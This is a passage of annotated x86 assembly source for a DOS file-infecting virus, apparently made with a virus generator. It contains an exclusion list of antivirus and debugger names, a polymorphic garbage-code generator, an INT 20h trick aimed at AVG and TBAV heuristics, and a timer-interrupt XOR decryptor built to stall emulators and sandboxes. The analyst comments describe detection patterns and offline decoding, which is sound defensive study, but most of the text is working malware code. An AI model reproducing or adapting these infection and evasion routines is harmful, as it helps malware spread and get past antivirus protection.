        jmp compar0              ;Yes check it !!!!!
  found:
        mov byte ptr [cs:((offset nasiel_s)-begin)],0h
found_1:popa
        ret

FINDSTR1 endp
; nasiel_s: result flag of FINDSTR (0 = name matched a table word,
;           0FFh = no match).
; Exe/Com : extension strings; not referenced by the code visible in this
;           excerpt.
; Tab     : exclusion list scanned by FINDSTR. A program whose file name
;           matches one of these words is NOT infected (infect_files only
;           proceeds when nasiel_s is 0FFh). Words are separated by 0 and the
;           list ends with 1.
nasiel_s:db 0
Exe db ".exe",0
Com db ".com",1
Tab db "avg",0
    db "fv386",0
    db "turbo",0
    db "fv86",0
    db "td",0
    db "stacker",0
    db "toolkit",0
    db "msav",0
    db "vc",0
    db "rex",0
    db "virlab",0
    db "vir",0
    db "alik",0
    db "guard",0
    db "nod",0
    db "tbav",0
    db "tbdriver",0
    db "clean",0
    db "f-pro",0
    db "avast",0
    db "asta",0
    db "tbscan",0
    db "debug",0
    db "cpav",0
    db "tlink",0
    db "vlad",0
    db "nav",0
    db "vshie",0
    db "dizz",0
    db "command",0
    db "hiew",0
    db "sswap",0
    db "scan",0
    db "tbclean",0
    db "vsafe",1
SpecForMT:     db ' For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? '
               db ' RADAR v PC Revue 9/94 '

; Who is M.T. ??? It is Slovak A-Ver 8) and this was my MSG
; FOR him
;******************************************************************************
; This procedure generates GARBAGE (instructions which have no other purpose
; than to increase the variance of the code)
; G_TABLE.INC ==> table of destination addresses and counts

last:      db     0

; Writes one two-byte filler instruction at CS:[DI].
; A random index 0..13 is drawn (values >= 14, or equal to the previous
; index kept in `last`, are redrawn) and the matching word of table2 is
; copied to CS:[DI]. All registers are restored before returning, so the only
; lasting effects are that word and the updated `last`.
; Analysis note: table2 holds a fixed set of 14 byte pairs (register
; self-moves such as 88h,0FFh / 89h,0C9h, plus 21h,0D2h and 2Ch,00h), so the
; filler slots always contain sequences drawn from this small alphabet.
DEADCODE proc near
	   push   ds
	   pusha
           push   di
           push   si
           push   dx
           push   dx
           pop    si
  again:
	   call   RND_BYTE
	   and    al,00011111b

           cmp    al,14        ; check range <0,13>
           jnc    again        ; Index in table2
           cmp    al,[cs: byte ptr (last-begin)]
           jz     again        ; never the same entry twice in a row
           mov    [cs:byte ptr (last-begin)],al

           mov    bx,table2-begin
           mov    ah,0
           add    ax,ax        ; index * 2 = byte offset of the entry
           push   ax
           pop    si
           add    si,bx
           mov    bx,[cs: word ptr si]
           mov    [cs: word ptr di],bx


  D_CODE_END:
           pop    bp           ; drop the three extra words pushed above;
           pop    si           ; popa restores the real register values
           pop    di
	   popa
	   pop    ds
	   ret
;-----------------------------------------------------------
; RND_BYTE: returns in AL one byte read from I/O port 40h (counter 0 of the
; system timer), used as the source of randomness.
 RND_BYTE proc near
           in al,40h
	   ret
 rnd_byte endp


; 14 two-byte filler entries indexed by DEADCODE
table2 :
          db   088h,0ffh,089h,0c9h,088h,0c9h,021h,0d2h
          db   089h,0c0h,088h,0c0h,088h,0e4h,089h,0dbh,088h,0dbh
          db   088h,0edh,089h,0d2h,088h,0d2h,088h,0f6h,02ch,000h

DEADCODE endp
end_c:
;================================================================

;################################################################
;########Kill Heuristick in AVG (sometimes and in TBAV)##########

;-----------------------------------------------------------------------
; INT 20h hook-and-call sequence (the banner above names its target:
; heuristic analysis in AVG and, sometimes, TBAV).
;
; What the code does, in order:
;   1. reads the current INT 20h vector through DOS (AH=35h) and saves it
;   2. points INT 20h at my_20, a handler that is a bare IRET
;   3. executes INT 20h, which therefore returns immediately
;   4. puts the saved vector back through DOS (AH=25h) and returns
;
; In:    si = delta offset (all data references are (label-begin)+si)
; Regs:  changes ax, bx, dx, ds, es
;
; Analyst note: INT 20h is normally the DOS "terminate program" call. A
; code emulator or heuristic that models INT 20h as an unconditional exit,
; without honouring the vector that was just installed, stops analysing at
; step 3 and never reaches the decoder. Following the live interrupt vector
; closes that gap; the get-vector / set-vector / INT 20h / set-vector
; sequence is itself a recognisable behavioural pattern.
;
; The dumbNN lines are `dw 3 dup(9090h)`, i.e. six NOP bytes executed
; inline. The file footer says the source was produced by a code generator,
; so these are presumably filler slots (TODO confirm).
;-----------------------------------------------------------------------
; Saved INT 20h vector: offset, segment.
old_20:  dw 0,0

; Replacement INT 20h handler: returns at once.
my_20:
	iret

avg_fuck:
dumb27: dw       3 dup(9090h)
        ; DOS get interrupt vector 20h -> es:bx
        mov	ax,3520h
        int	21h
dumb28: dw       3 dup(9090h)
        mov	word ptr [cs : (old_20 - begin)+si],bx
dumb29: dw       3 dup(9090h)
        mov	word ptr [cs : (old_20 - begin+2)+si],es
dumb30: dw       3 dup(9090h)

        ; ds:dx = address of my_20 in the running copy
        push     cs
        pop     ds
dumb31: dw      3 dup(9090h)
        mov     dx,my_20-begin
        add     dx,si
dumb32: dw      3 dup(9090h)
        ; ax = 2510h + 10h = 2520h (DOS set interrupt vector 20h); the
        ; constant is built in two steps, presumably so the literal 2520h
        ; is not loaded by a single instruction
        mov     ax,2510h
dumb33: dw      3 dup(9090h)
        add     ax,10h
        int     21h
dumb34: dw      3 dup(9090h)

        ; reaches my_20 and returns; see the analyst note above
        int     20h

        ; restore the original INT 20h vector from old_20
        mov	dx, word ptr [cs: (old_20-begin)+si]
dumb35: dw      3 dup(9090h)
        mov	ds, word ptr [cs: (old_20-begin+2)+si]
dumb36: dw      3 dup(9090h)
        mov	ax,2520h
dumb37: dw      3 dup(9090h)
        int	21h
dumb38: dw      3 dup(9090h)

        ret
;############################################################################
;############################################################################
;==========================================================================;
             nop
; Entry stub: svir reaches this with `call _protector`; the jump skips the
; data below and continues in _protect1, whose final `ret` returns to svir.
_protector:  jmp        _protect1
             nop
; Saved INT 08h vector (offset, segment), filled in by _protect1.
int_8:       dw         0,0
; One-byte XOR key read by dec_8. A value of 0 makes dec_8 skip its loop,
; i.e. the body is then taken to be stored unencoded.
_value:      db         0
;-----------------------------------------------------------------------
; dec_8 -- temporary INT 08h handler installed by _protect1.
; Runs in interrupt context and relies on si still holding the delta offset
; of the interrupted code (the wait loop in _protect1).
;
; Actions:
;   * overwrites the word at jjjj with 9090h, which releases the wait loop
;   * if _value is non-zero, XORs every byte of beg_c..end_c with _value
;   * writes 20h to port 20h (end-of-interrupt to the interrupt controller)
;   * returns with IRET; there is no jump or call to the vector saved in
;     int_8 anywhere in this handler
;
; Analyst note: the body is protected by a single-byte XOR over a fixed
; range, so a stored sample can be decoded offline by reading _value (or
; trying all 255 non-zero keys) without executing anything. At run time the
; decode only happens when a timer interrupt is actually delivered, which
; is what an emulator has to provide for analysis to proceed.
;-----------------------------------------------------------------------
dec_8:
              ;======== overwrite the instruction at jjjj with two NOPs ========
             mov        ax,9090h
             mov        word ptr [cs : ((offset jjjj)-begin) + si],ax

; hand-assembled `mov cx, end_c-beg_c` (opcode B9h + 16-bit immediate):
; number of bytes to process
decod1:      db         0b9h
             dw         end_c-beg_c
             push       si
             mov        dl,byte ptr [cs: (offset(_value)-offset(begin)) + si]
             cmp        dl,0
             jz         decod7
decod4:
             ; byte at cs:[beg_c + delta + i] ^= key
             xor        [cs: byte ptr si+(beg_c-begin)],dl
             inc        si
; hand-assembled `dec cx` (opcode 49h)
decod6:      db         49h
             jnz        decod4
decod7:
             pop        si

             ; end-of-interrupt for the timer IRQ
             mov        al,20h
             out        20h,al

             iret


;==========================================================================

;-----------------------------------------------------------------------
; _protect1 -- decode the body from inside a timer interrupt.
; Reached through the _protector stub. In: si = delta offset.
;
; Sequence:
;   1. es = 0002h, so es:0 / es:2 address linear 00020h = 4 * 08h, the
;      interrupt-vector-table slot of INT 08h (timer tick)
;   2. save the current vector in int_8 and the word at jjjj in backup
;   3. with interrupts disabled, write cs:(dec_8+delta) straight into the
;      table -- no DOS call is involved, so nothing watching INT 21h
;      AH=25h sees the change
;   4. spin in the jamp/jjjj loop until dec_8 has run once and replaced the
;      jump at jjjj with NOPs
;   5. restore the INT 08h vector and the original word at jjjj, return
;
; Regs:  changes ax, bx, dx, ds, es
;
; Analyst note: execution leaves step 4 only if a hardware timer interrupt
; is delivered. An emulator or sandbox that does not generate IRQ0 loops
; here indefinitely and never sees the decoded body. Direct writes to
; 0000:0020h followed by a tight backward-jump loop are a detectable
; behavioural pattern.
;
; The dumbNN lines are runs of NOP words (9090h) executed inline.
;-----------------------------------------------------------------------
_protect1:
             sti
dumb2:       dw         23 dup(9090h)
             ; es = 0002h (see step 1)
             mov        ax,2h
             push       ax
dumb3:       dw         9 dup(9090h)
             pop        es
             ; bx:ax = current INT 08h vector (offset in bx, segment in ax)
             mov        bx,word ptr [es: 0]
dumb4:       dw         3 dup(9090h)
             mov        ax,word ptr [es: 2]
dumb5:       dw         6 dup(9090h)
             mov        [cs:((offset int_8)-begin)+si],bx
dumb6:       dw         16 dup(9090h)
             mov        [cs:((offset int_8)-begin+2)+si],ax

             ; ds:dx = address of dec_8 in the running copy
             push       cs
dumb7:       dw         7 dup(9090h)
             pop        ds
             mov        dx,((offset dec_8)-begin)
             add        dx,si
dumb8:       dw         3 dup(9090h)
             ; keep a copy of the jump instruction that dec_8 will overwrite
             mov        ax,word ptr [cs : ((offset jjjj)-begin) + si]
dumb9:       dw         3 dup(9090h)
             mov        word ptr [cs : ((offset backup)-begin) + si],ax
             ; install the new vector atomically with respect to interrupts
             cli
dumb10:      dw         9 dup(9090h)
             mov        word ptr [es: 0],dx
dumb11:      dw         1 dup(9090h)
             mov        word ptr [es: 2],ds
dumb12:      dw         3 dup(9090h)
             sti
; wait loop: 32 NOP words, then jump back to jamp
jamp:
dumb13:      dw         32 dup(9090h)

; dec_8 replaces one word here with 9090h, so this is presumably assembled
; as a 2-byte short jump; once it is replaced, execution falls through
jjjj:        jmp        jamp
             ; put the saved INT 08h vector back
             cli
             mov        dx,[cs:((offset int_8)-begin)+si]
dumb14:      dw         4 dup(9090h)
             mov        ax,[cs:((offset int_8)-begin+2)+si]
dumb15:      dw         5 dup(9090h)
             mov        word ptr [es: 0],dx
dumb16:      dw         5 dup(9090h)
             mov        word ptr [es: 2],ax
             sti
dumb17:      dw         15 dup(9090h)
             ; restore the jump at jjjj from backup
             mov        ax,word ptr [cs : ((offset backup)-begin) + si]
dumb18:      dw         8 dup(9090h)
             ; dumb26 is a run of NOPs followed by ret; ax is unchanged
             call       dumb26
             mov        word ptr [cs : ((offset jjjj)-begin) + si],ax
             ret
; Copy of the original word at jjjj (initial content: two NOPs).
backup:      dw         9090h

;############################################################################
;############################################################################
;############################################################################
;############################################################################
;############################################################################
;############################################################################

;-----------------------------------------------------------------------
; svir -- first code executed; the `jmp svir` at startprog lands here.
;
;   * loads si with the 16-bit value stored at `delta`; every later data
;     reference has the form (label-begin)+si, so this word is what makes
;     the code position-independent (per the author's comment, the data
;     offset is put in here)
;   * pushes si, ax, bx, cx, dx, es, ds, bp and es again, interleaved with
;     calls to dumb25/dumb26, which execute only NOPs and return
;   * runs the INT 20h sequence (avg_fuck) with the general registers and
;     si preserved around it
;   * calls _protector, which returns after the body has been decoded
;   * jumps to beg_c, the start of the decoded body
;
; Analyst note: this stub, avg_fuck and _protector/_protect1/dec_8 lie
; outside the beg_c..end_c range that dec_8 XORs, so they are the part of a
; stored sample that is not covered by the XOR layer. The dumbNN slots are
; runs of NOP words (9090h); the _pNN labels mark the register pushes and
; are not referenced in the visible part of the file.
;-----------------------------------------------------------------------
svir:

          db       0beh                    ;Stands for MOV SI,xxxx
delta     dw       offset begin            ;We'll put the data offset in.

          push     si
dumb1:    dw       5 dup(9090h)
; ax is pushed, popped and pushed again; the net effect is a single push
_p10:     push     ax
          call     dumb26
          pop      ax
          call     dumb25
          push     ax
dumb19:   dw       3 dup(9090h)
          call     dumb25
_p20:     push     bx
dumb20:   dw       4 dup(9090h)
          call     dumb25
_p30:     push     cx
dumb21:   dw       8 dup(9090h)
          call     dumb26
_p40:     push     dx
dumb22:   dw       6 dup(9090h)
          call     dumb26
_p50:     push     es
dumb23:   dw       1 dup(9090h)
          call     dumb25
_p60:     push     ds
          call     dumb26
dumb24:   dw       1 dup(9090h)
          call     dumb26
_p70:     push     bp
          call     dumb26
          push     es

          ; INT 20h hook-and-call sequence, registers preserved around it
          push     si
          pusha
          call     avg_fuck
          popa
          pop      si

          ; install the temporary INT 08h handler and wait for the decode
          call     _protector
; continue in the decoded body
jmp       beg_c
; Do-nothing helpers called from svir and _protect1.
; dumb26: 13 NOP words (26 NOP bytes) followed by ret.
dumb26:   dw       13 dup(9090h)
          ret
; dumb25: 2 NOP words, then a jump into dumb26, whose ret returns to the
; caller of dumb25.
dumb25:   dw       2 dup(9090h)
          jmp      dumb26

; Not referenced anywhere in the visible part of the file.
dddddd:   jmp      dumb25
; Host-program restore data, used by the code at beg_c (start of the file):
; for a COM host that code sets eps = cs, epo = 100h and ess = cs; otherwise
; it adds PSP segment + 10h to eps and ess. The names and that usage suggest
; entry-point offset, entry-point segment and stack segment of the host.
epo        : dw ?
eps        : dw ?
ess        : dw ?
; Four bytes that beg_c copies to cs:100h..103h for a COM host, i.e. the
; host's original first four bytes (initial content: four NOPs).
orig_instr : db 90h,90h,90h,90h
; Constant word 1111h; no use of it is visible in this part of the file.
; NOTE(review): presumably a marker checked elsewhere -- confirm before
; relying on it as an indicator.
sign:
             dw         1111h
; End of the measured body: virlength is defined as end_vir-begin.
end_vir:
; Label at the first byte past the body.
buff:
codes   ends
end     startprog
;#########################################################################
;##                    This source was generated by                     ##
;##                Blesk's Funky Generator by Blesk/SVL                 ##
;#########################################################################
;##                I used FOG - Funky Op code Generator                 ##
;##                           THANX ......                              ##
;#########################################################################